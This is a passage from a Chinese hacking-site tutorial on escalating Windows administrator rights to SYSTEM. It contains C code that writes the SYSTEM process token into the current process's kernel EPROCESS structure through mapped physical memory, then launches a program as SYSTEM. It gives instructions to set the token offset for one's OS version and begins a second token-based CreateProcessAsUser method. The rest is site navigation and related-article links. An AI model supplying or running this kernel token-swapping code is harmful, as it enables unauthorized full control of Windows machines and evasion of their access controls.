管理员组获取系统权限的完美解决方案

• 　 CurrentEprocessTokenValue = GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET));
  
  　 printf("Current EPROCESS : %08x\n", CurrentEprocess);
  　 printf("Current Process Token : %08x\nPress ENTER to continue...\n",
  　　　 CurrentEprocessTokenValue);
  　 //getchar();
  　 SetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET), SystemEprocessTokenValue);
  　 printf("Current Process Token : %08x\n",
  　　　 GetData((PVOID)(GetEprocessFromId(GetCurrentProcessId())+TOKEN_OFFSET)));
  　 printf("Press ENTER to create process...\n");
  　 //getchar();
  
  　 if( GetData((PVOID)(CurrentEprocess+TOKEN_OFFSET))
  　　　 == GetData((PVOID)(SystemEprocess+TOKEN_OFFSET))　
  　　　 )
  　　　 // It is so surprised that SYSTEM's Token always in changing.
  　　　 // So before create new process, we should ensure the TOKEN is all right
  　 {
  　　　 ShellExecute(NULL, "open", (argc==2)?argv[1]:"c:\\windows\\regedit.exe", NULL, NULL, SW_SHOWNORMAL);
  　 }
  　 UnmapViewOfFile(g_pMapPhysicalMemory);
  　 CloseHandle(g_hMPM);
  　 CloseNTDLL();
  
  　 return 0;
  }
  
  
  在上面的代码中,请将TOKEN_OFFSET改成你的系统版本的偏移值.我们也可以想像到由于是操作了系统的内核空间,搞不好会出现蓝屏现象(尽管机率很小).
  
  =========================================================================================================
  第二种方法，我们不自己创建进程，而是直接用System进程的Token来创建进程.看到这，大家可能又想到了远线程。
  这里不是。我的思路是:配置好桌面(desktop),工作区间(WindowStation)等信息，最后调用CreateProcessAsUser来创建子进程。
  用这种方法极为稳定。这里一些关于获取SID的代码可以看我前一段时间写的"一种新的穿透_blank">防火墙的数据传输技术".
  
  下面是源代码,这段代码也实现了RUNAS的功能,有兴趣可以研究一下,大部分都来自MSDN:
  
  #include <windows.h>
  #include <stdio.h>
  #include <Tlhelp32.h>
  #include <AccCtrl.h>
  #include <Aclapi.h>
  #include <wtsapi32.h>
  
  #pragma comment(lib, "wtsapi32")
  
• 上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] [17] [18] [19] [20] [21] [22] [23] [24] [25] 下一页 
• 复制本页网址和标题，发送给你QQ/Msn的好友一起分享
  
  
• 管理员组获取系统权限的完美解决方案 相关文章：
• ·网管秘籍 审核网络安全的十大必备工具
• ·Fedora 8下Apache配置与管理
• ·Cisco管理需要了解的默认路由
• ·BPEL的异常管理
• ·网管必读 黑客通过什么方式入侵网吧
• ·网吧网管必读 网吧被入侵后如何解决
• ·学好Word文档管理
• ·KV网络版技术升级 离线管理全网漏洞
• ·初级网管或黑客必需撑握的8个DOS命令
• ·windows服务器的管理途径
• 管理员组获取系统权限的完美解决方案 相关软件
• ·公司企业网站管理系统模板功能强大版
• ·学校源码管理系统超靓版V2008
• ·秦林新作《管好你的嘴》
• ·《奇异管道》益智连线试玩
• ·NDS《旋风管家》模拟器
• ·SOFTMAY田径运动会编排管理系统专业版v8.3
• ·《中国的总管家---周恩来》
• ·掌握中国人性的管理方法
• ·沟通管理学（exe、chm版）
• ·管理者必知的22个硬道理

上一篇:连战北大演讲全文

下一篇:破解网络尖兵

• 特别声明：本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载，但请务必注明出处和原始作
• 者.文章版权归文章原始作者所有.对于被本站转载文章的个人和网站，我们表示深深的谢意。如果本站转
• 载的文章有版权问题请联系编辑人员,我们尽快予以更正. 转载请注明来源：http://www.hackhome.com

精品推荐

热点TOP10

特别推荐